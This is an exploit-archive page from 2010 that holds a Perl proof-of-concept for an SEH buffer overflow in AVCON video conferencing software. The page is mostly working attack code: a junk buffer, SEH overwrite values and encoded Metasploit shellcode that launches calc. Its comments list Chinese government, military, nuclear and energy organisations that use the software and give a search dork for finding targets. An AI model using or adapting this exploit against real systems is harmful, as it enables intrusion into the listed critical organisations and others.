Home / os / win7

AVCON Buffer Overflow

Posted on 07 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>AVCON Buffer Overflow</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================== AVCON Buffer Overflow ===================== #!/usr/bin/perl # Exploit Title: AVCON Buffer Overflow # Date: 5/7/10 # Author: Dillon Beresford # URL: http://www.avcon.com.cn/ # Version: 4.6.8.7 # Tested on: XP SP2 and SP3 # CVE : NONE # Code : exploit.pl # Twitter: http://twitter.com/D1N # Dork: site:gov.cn &quot;AVCON&quot; # There are other bugs... This is just for fun ;-) # Paste the output from exploit.txt into AVH323GW.exe # Enjoy the wang chung++ and look for the other bugs. ;) # 2 products from China and 2 0days in one month dizam! # Okay so who uses AVCON4 and why is it so important? # China's State Grid # China's State Information Center # China's Customs armed police # China's Shenyang Military Region # China's Yunnan Frontier Corps # China's Nuclear Agencies # China Life Insurance Company # China Pacific Insurance Group # China National Petroleum Corporation # Daqing Oilfield Material Group # Grace Pai Henan Electric Power # China Civil Aviation Information Group # China Southern Airlines Co., Ltd. # Shenzhen International Trust # National Grain and Oil Information Center # Anyang City of Henan Province E # Guangdong Food and Drug Administration ## EDB Test Notes: ## Software can be installed as English. Once installed, go to &quot;Start&quot; -&gt; &quot;AVCON4&quot; -&gt; ## run &quot;AVH323GW.exe&quot;, copy and paste the exploit (string) to the input field (there's only one), ## and click on &quot;call&quot;. my $exploit = &quot;poc.txt&quot;; my $junk = &quot;x41&quot; x 1019; my $nSEH = &quot;xebx06x90x90&quot;; # jmp 6 bytes my $SEH = pack('V',0x200504B4); # pop pop ret # windows/exec - 218 bytes # http://www.metasploit.com # Encoder: x86/fnstenv_mov # EXITFUNC=seh, CMD=calc my $buf = &quot;x6ax31x59xd9xeexd9x74x24xf4x5bx81x73x13xc4&quot; . &quot;xd2xe5x7bx83xebxfcxe2xf4x38x3ax6cx7bxc4xd2&quot; . &quot;x85xf2x21xe3x37x1fx4fx80xd5xf0x96xdex6ex29&quot; . &quot;xd0x59x97x53xcbx65xafx5dxf5x2dxd4xbbx68xee&quot; . &quot;x84x07xc6xfexc5xbax0bxdfxe4xbcx26x22xb7x2c&quot; . &quot;x4fx80xf5xf0x86xeexe4xabx4fx92x9dxfex04xa6&quot; . &quot;xafx7ax14x82x6ex33xdcx59xbdx5bxc5x01x06x47&quot; . &quot;x8dx59xd1xf0xc5x04xd4x84xf5x12x49xbax0bxdf&quot; . &quot;xe4xbcxfcx32x90x8fxc7xafx1dx40xb9xf6x90x99&quot; . &quot;x9cx59xbdx5fxc5x01x83xf0xc8x99x6ex23xd8xd3&quot; . &quot;x36xf0xc0x59xe4xabx4dx96xc1x5fx9fx89x84x22&quot; . &quot;x9ex83x1ax9bx9cx8dxbfxf0xd6x39x63x26xaexd3&quot; . &quot;x68xfex7dxd2xe5x7bx94xbaxd4xf0xabx55x1axae&quot; . &quot;x7fx2cxebx49x2exbax43xeex79x4fx1axaexf8xd4&quot; . &quot;x99x71x44x29x05x0exc1x69xa2x68xb6xbdx8fx7b&quot; . &quot;x97x2dx30x18xa5xbex86x7b&quot;; my $padding = &quot;x90&quot; x 5000; # padding my $payload = $junk.$nSEH.$SEH.$buf.$padding; open (myfile,&quot;&gt;$exploit&quot;); print myfile $payload; close (myfile); # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-07]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP